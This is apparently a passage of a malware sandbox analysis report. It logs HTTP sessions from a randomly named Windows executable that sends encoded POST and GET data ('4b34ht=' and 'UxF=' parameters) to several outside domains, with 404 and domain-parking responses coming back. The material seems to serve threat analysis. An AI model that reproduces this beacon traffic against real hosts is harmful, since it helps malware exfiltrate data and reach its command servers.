                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.falldove.top
                                          Origin: http://www.falldove.top
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 227
                                          Referer: http://www.falldove.top/ewqf/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:44:20.242775917 CEST  637                IN         HTTP/1.1 404 Not Found
                                          Date: Mon, 27 May 2024 10:44:20 GMT
                                          Server: Apache
                                          Content-Length: 493
                                          Connection: close
                                          Content-Type: text/html
                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          23          192.168.2.5  49738        66.29.149.46    80                6408  C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp                             Bytes transferred  Direction  Data
                                          May 27, 2024 12:44:22.177687883 CEST  1793               OUT        POST /ewqf/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.falldove.top
                                          Origin: http://www.falldove.top
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 1243
                                          Referer: http://www.falldove.top/ewqf/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:44:22.775367975 CEST  637                IN         HTTP/1.1 404 Not Found
                                          Date: Mon, 27 May 2024 10:44:22 GMT
                                          Server: Apache
                                          Content-Length: 493
                                          Connection: close
                                          Content-Type: text/html
                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          24          192.168.2.5  49739        66.29.149.46    80                6408  C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp                             Bytes transferred  Direction  Data
                                          May 27, 2024 12:44:24.871393919 CEST  503                OUT        GET /ewqf/?4b34ht=kYShQH1sa3Le60gDrsgCYGFyuVEpRJ0k4IW5QzbfeKprYk61XZyNmSsEdCDrGrgTxI+6jeCx+L1A4qHHQky9AsRR7ruU+KhrWGBfvU9SpfMi+rY6DVY8elzf7b7Bw6Cu6g==&UxF=2Nflznk0WJ3hjv HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.falldove.top
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:44:25.474874020 CEST  652                IN         HTTP/1.1 404 Not Found
                                          Date: Mon, 27 May 2024 10:44:25 GMT
                                          Server: Apache
                                          Content-Length: 493
                                          Connection: close
                                          Content-Type: text/html; charset=utf-8
                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          25          192.168.2.5  49740        3.125.172.46    80                6408  C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp                             Bytes transferred  Direction  Data
                                          May 27, 2024 12:44:32.232439995 CEST  780                OUT        POST /11y6/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.lesfleursdeceline.be
                                          Origin: http://www.lesfleursdeceline.be
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 207
                                          Referer: http://www.lesfleursdeceline.be/11y6/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:44:32.907332897 CEST  1236               IN         HTTP/1.1 404 Not Found
                                          Server: openresty
                                          Date: Mon, 27 May 2024 10:44:32 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Set-Cookie: PHPSESSID=k9d4iv5dbh9ou7ovo21hqi26vc; path=/; domain=lesfleursdeceline.be; HttpOnly
                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                          Cache-Control: no-store, no-cache, must-revalidate
                                          Pragma: no-cache
                                          Content-Encoding: gzip


                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                          26          192.168.2.5  49741        3.125.172.46    80                6408  C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp                             Bytes transferred  Direction  Data
                                          May 27, 2024 12:44:34.766613960 CEST  800                OUT        POST /11y6/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.lesfleursdeceline.be
                                          Origin: http://www.lesfleursdeceline.be
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 227
                                          Referer: http://www.lesfleursdeceline.be/11y6/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:44:35.478884935 CEST  1236               IN         HTTP/1.1 404 Not Found
                                          Server: openresty
                                          Date: Mon, 27 May 2024 10:44:35 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Set-Cookie: PHPSESSID=7uhsc6i4svlnjts9umv7lmifdb; path=/; domain=lesfleursdeceline.be; HttpOnly
                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                          Cache-Control: no-store, no-cache, must-revalidate
                                          Pragma: no-cache
                                          Content-Encoding: gzip


                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                          27  192.168.2.5  49742  3.125.172.46  80  6408  C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp  Bytes transferred  Direction  Data
                                          May 27, 2024 12:44:37.299787045 CEST  1817  OUT  POST /11y6/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.lesfleursdeceline.be
                                          Origin: http://www.lesfleursdeceline.be
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 1243
                                          Referer: http://www.lesfleursdeceline.be/11y6/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Ascii: 4b34ht= [TRUNCATED]
                                          May 27, 2024 12:44:37.980705023 CEST  1236  IN  HTTP/1.1 404 Not Found
                                          Server: openresty
                                          Date: Mon, 27 May 2024 10:44:37 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Set-Cookie: PHPSESSID=fi8non3nopf054137q44k8r9f5; path=/; domain=lesfleursdeceline.be; HttpOnly
                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                          Cache-Control: no-store, no-cache, must-revalidate
                                          Pragma: no-cache
                                          Content-Encoding: gzip


                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                          28  192.168.2.5  49743  3.125.172.46  80  6408  C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp  Bytes transferred  Direction  Data
                                          May 27, 2024 12:44:39.831891060 CEST  511  OUT  GET /11y6/?4b34ht=Dwy6CWGja1kYD5j/NiyuAt+/fS8dx1oXABRd8IB5T1BIX3lRMt9N7dOmg29JYmKAoU96l3n9gZEsdf5amHP+judxC5mcbKzq6E6B/htT/kbgwKzkG09OKna/oGm6dpHmyw==&UxF=2Nflznk0WJ3hjv HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.lesfleursdeceline.be
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:44:40.540193081 CEST  1236  IN  HTTP/1.1 404 Not Found
                                          Server: openresty
                                          Date: Mon, 27 May 2024 10:44:40 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Set-Cookie: PHPSESSID=4bo93gfecst1n2q9af31s2qieb; path=/; domain=lesfleursdeceline.be; HttpOnly
                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                          Cache-Control: no-store, no-cache, must-revalidate
                                          Pragma: no-cache
                                          Data Ascii: 8000<!DOCTYPE html><html class="no-js" prefix="og: https://ogp.me/ns#" lang="fr"><head><link rel="preconnect" href="https://d1di2lzuh97fh2.cloudfront.net" crossorigin><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><meta charset="utf-8"><link rel="icon" href="https://d1di2lzuh97fh2.cloudfront.net/client/img/favicons/sb-favicon.svg?ph=8290e35a9b" type="image/svg+xml" sizes="any"><link rel="icon" href="https://d1di2lzuh97fh2.cloudfront.net/client/img/favicons/sb-favicon-16.svg?ph=8290e35a9b" type="image/svg+xml" sizes="16x16"><link rel="icon" href="https://d1di2lzuh97fh2.cloudfront.net/client/img/favicons/sb-favicon.ico?ph=8290e35a9b"><link rel="apple-touch-icon" href="https://d1di2lzuh97fh2.cloudfront.net/client/img/favicons/sb-favicon.ico?ph=8290e35a9b"><link rel="icon" href="https://d1di2lzuh97fh2.cloudfront.net/client/img/


                                          Session ID  Source IP  Source Port  Destination IP  Destination Port
                                          29  192.168.2.5  49744  199.59.243.225  80
                                          Timestamp  Bytes transferred  Direction  Data
                                          May 27, 2024 12:44:45.767179012 CEST  750  OUT  POST /gp7t/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.btx937.top
                                          Origin: http://www.btx937.top
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 207
                                          Referer: http://www.btx937.top/gp7t/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Ascii: 4b34ht=mCCktGpzzkwMaEgpFTJXKA8PfM9a780p/BajRmleXG+mxHlGyPjbRxT1JQZdEGHxSvItLyc0LCSh7Xd+gTKjPFvxdGLrKhdXIjXnwK4ogCkVq+vjLbk35q+DRaajK7Q0gymjQ2R2f7RQv3eNlj5colFOqbQwZZyWP9HVIM6b14TKvwh8Ldz+cZkR1Bj1iFBE0kTSJlM=
                                          May 27, 2024 12:44:46.249222040 CEST  1236  IN  HTTP/1.1 200 OK
                                          date: Mon, 27 May 2024 10:44:45 GMT
                                          content-type: text/html; charset=utf-8
                                          content-length: 1106
                                          x-request-id: 44cb4576-f8b4-46bd-ab0b-ac6c742fc093
                                          cache-control: no-store, max-age=0
                                          accept-ch: sec-ch-prefers-color-scheme
                                          critical-ch: sec-ch-prefers-color-scheme
                                          vary: sec-ch-prefers-color-scheme
                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CPrDQ9UxT+/ieIFhvsxX3lJj9eMO0/NNNsOfaEKVF3CzxJc+H+C9dvVQ6XNisb9OZRDKmcn+Xnr/LbVE2vF4PA==
                                          set-cookie: parking_session=44cb4576-f8b4-46bd-ab0b-ac6c742fc093; expires=Mon, 27 May 2024 10:59:46 GMT; path=/
                                          connection: close
                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CPrDQ9UxT+/ieIFhvsxX3lJj9eMO0/NNNsOfaEKVF3CzxJc+H+C9dvVQ6XNisb9OZRDKmcn+Xnr/LbVE2vF4PA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                          May 27, 2024 12:44:46.249265909 CEST  559  IN
                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDRjYjQ1NzYtZjhiNC00NmJkLWFiMGItYWM2Yzc0MmZjMDkzIiwicGFnZV90aW1lIjoxNzE2ODA2Nj


                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                          30  192.168.2.5  49745  199.59.243.225  80  6408  C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp  Bytes transferred  Direction  Data
                                          May 27, 2024 12:44:48.298798084 CEST  770  OUT  POST /gp7t/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.btx937.top
                                          Origin: http://www.btx937.top
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 227
                                          Referer: http://www.btx937.top/gp7t/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Ascii: 4b34ht=mCCktGpzzkwMYkQpWghXPg8MD89aiM0t/BGjRngFQ0qmwnVGgKXbcRT1CwZYKmGzSv1QLyg0LCGh7WN+ggSkOVvzRmLpOhdXIjXnwK8GgCsVqu/jK+Q04q+EUqajO7QKgynwQ3dcf45Qvy6Nl2FbnlFAn7RaZKfDCeXPEdPIrujXjmMWR/7WP5IplSrCz1gtuHDiXyaPXalUncxtnlb+MpwRP7ed
                                          May 27, 2024 12:44:48.762960911 CEST  1236  IN  HTTP/1.1 200 OK
                                          date: Mon, 27 May 2024 10:44:47 GMT
                                          content-type: text/html; charset=utf-8
                                          content-length: 1106
                                          x-request-id: c9f2efbf-7f9b-4d2a-8cd7-76fa391a4018
                                          cache-control: no-store, max-age=0
                                          accept-ch: sec-ch-prefers-color-scheme
                                          critical-ch: sec-ch-prefers-color-scheme
                                          vary: sec-ch-prefers-color-scheme
                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CPrDQ9UxT+/ieIFhvsxX3lJj9eMO0/NNNsOfaEKVF3CzxJc+H+C9dvVQ6XNisb9OZRDKmcn+Xnr/LbVE2vF4PA==
                                          set-cookie: parking_session=c9f2efbf-7f9b-4d2a-8cd7-76fa391a4018; expires=Mon, 27 May 2024 10:59:48 GMT; path=/
                                          connection: close
                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CPrDQ9UxT+/ieIFhvsxX3lJj9eMO0/NNNsOfaEKVF3CzxJc+H+C9dvVQ6XNisb9OZRDKmcn+Xnr/LbVE2vF4PA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                          May 27, 2024 12:44:48.763050079 CEST  559  IN
                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzlmMmVmYmYtN2Y5Yi00ZDJhLThjZDctNzZmYTM5MWE0MDE4IiwicGFnZV90aW1lIjoxNzE2ODA2Nj


                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                          31  192.168.2.5  49746  199.59.243.225  80  6408  C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp  Bytes transferred  Direction  Data
                                          May 27, 2024 12:44:50.828563929 CEST  1787  OUT  POST /gp7t/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.btx937.top
                                          Origin: http://www.btx937.top
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 1243
                                          Referer: http://www.btx937.top/gp7t/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Ascii: 4b34ht= [TRUNCATED]
                                          May 27, 2024 12:44:51.286164045 CEST | 1236 | IN | HTTP/1.1 200 OK
                                          date: Mon, 27 May 2024 10:44:50 GMT
                                          content-type: text/html; charset=utf-8
                                          content-length: 1106
                                          x-request-id: 697ffe86-c85d-4ca2-94e7-a627aefde949
                                          cache-control: no-store, max-age=0
                                          accept-ch: sec-ch-prefers-color-scheme
                                          critical-ch: sec-ch-prefers-color-scheme
                                          vary: sec-ch-prefers-color-scheme
                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CPrDQ9UxT+/ieIFhvsxX3lJj9eMO0/NNNsOfaEKVF3CzxJc+H+C9dvVQ6XNisb9OZRDKmcn+Xnr/LbVE2vF4PA==
                                          set-cookie: parking_session=697ffe86-c85d-4ca2-94e7-a627aefde949; expires=Mon, 27 May 2024 10:59:51 GMT; path=/
                                          connection: close
                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_CPrDQ9UxT+/ieIFhvsxX3lJj9eMO0/NNNsOfaEKVF3CzxJc+H+C9dvVQ6XNisb9OZRDKmcn+Xnr/LbVE2vF4PA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                          May 27, 2024 12:44:51.286216974 CEST | 559 | IN
                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNjk3ZmZlODYtYzg1ZC00Y2EyLTk0ZTctYTYyN2FlZmRlOTQ5IiwicGFnZV90aW1lIjoxNzE2ODA2Nj


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          32 | 192.168.2.5 | 49747 | 199.59.243.225 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:44:53.365787029 CEST | 501 | OUT | GET /gp7t/?4b34ht=rAqEu2gSv2s2Q34sajdUQRUadeB85tkFqSKdenQDQ2DGw2dO3uX5Zw6KDTM8IV3Tf+lQDmhmNxGX2EN4uh2PDjjxVn+OEzZBTy/UzpMaoQhQyJClBqNmt4mNfKWMNb1t7Q==&UxF=2Nflznk0WJ3hjv HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.btx937.top
                                          Connection: close
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          May 27, 2024 12:44:53.954135895 CEST | 1236 | IN | HTTP/1.1 200 OK
                                          date: Mon, 27 May 2024 10:44:53 GMT
                                          content-type: text/html; charset=utf-8
                                          content-length: 1498
                                          x-request-id: 5137060e-5c6c-4927-bea7-83ab473b4daa
                                          cache-control: no-store, max-age=0
                                          accept-ch: sec-ch-prefers-color-scheme
                                          critical-ch: sec-ch-prefers-color-scheme
                                          vary: sec-ch-prefers-color-scheme
                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cHRUdIm2s7+8fRhV/we/x5yvmLfQlfVFyj3Xrx2fqxPLubD6RgF1gGt+Gxi2rmV9r7NUgFShV4vvWzBFgo3K0g==
                                          set-cookie: parking_session=5137060e-5c6c-4927-bea7-83ab473b4daa; expires=Mon, 27 May 2024 10:59:53 GMT; path=/
                                          connection: close
                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_cHRUdIm2s7+8fRhV/we/x5yvmLfQlfVFyj3Xrx2fqxPLubD6RgF1gGt+Gxi2rmV9r7NUgFShV4vvWzBFgo3K0g==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                          May 27, 2024 12:44:53.954174995 CEST | 951 | IN
                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTEzNzA2MGUtNWM2Yy00OTI3LWJlYTctODNhYjQ3M2I0ZGFhIiwicGFnZV90aW1lIjoxNzE2ODA2Nj


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                          33 | 192.168.2.5 | 49748 | 199.59.243.225 | 80 | 6408 | C:\Program Files (x86)\SsffkNIowRsReJBYlDZpsAqXDiYZSMDNIfLoWWAcjuRlhiYNTxfcNBJnSqzyGrAHTAT\vFRZZQiLgeOQDzGymvZVa.exe
                                          Timestamp | Bytes transferred | Direction | Data
                                          May 27, 2024 12:44:59.169945002 CEST | 753 | OUT | POST /oh6m/ HTTP/1.1
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Host: www.equi-sen.ca
                                          Origin: http://www.equi-sen.ca
                                          Connection: close
                                          Content-Type: application/x-www-form-urlencoded
                                          Cache-Control: no-cache
                                          Content-Length: 207
                                          Referer: http://www.equi-sen.ca/oh6m/
                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                          Data Ascii: 4b34ht=5jLNMXb2XtHOrmU2JYT0CRnIwS7mWMdSoLFk8af+7539qHwLrxsRk84q+tnxBnwzW6EOofHXi5pFyRe1aos5vfu6y8KMmotm7TC5mCFQdPa631yKgpieN/vMWde5AMtZaTlIPFTWZCWlu2vKpVfwNJTgZIjJ+UiEoALNgg3brQZkvRK+f+2hHNI12toisOkgJq0wA3g=
                                          May 27, 2024 12:44:59.665190935 CEST | 1236 | IN | HTTP/1.1 200 OK
                                          date: Mon, 27 May 2024 10:44:59 GMT
                                          content-type: text/html; charset=utf-8
                                          content-length: 1110
                                          x-request-id: 3727262a-6784-456b-9444-550bdfc3befe
                                          cache-control: no-store, max-age=0
                                          accept-ch: sec-ch-prefers-color-scheme
                                          critical-ch: sec-ch-prefers-color-scheme
                                          vary: sec-ch-prefers-color-scheme
                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_A9hQ+aOK6MB6q+WmiZWmfu36BSUhp5CDsiEfAZMmU1G72U1x9lg0anxEslf/g5SUeDaVbkfGoy93IaxO1UQaYQ==
                                          set-cookie: parking_session=3727262a-6784-456b-9444-550bdfc3befe; expires=Mon, 27 May 2024 10:59:59 GMT; path=/
                                          connection: close
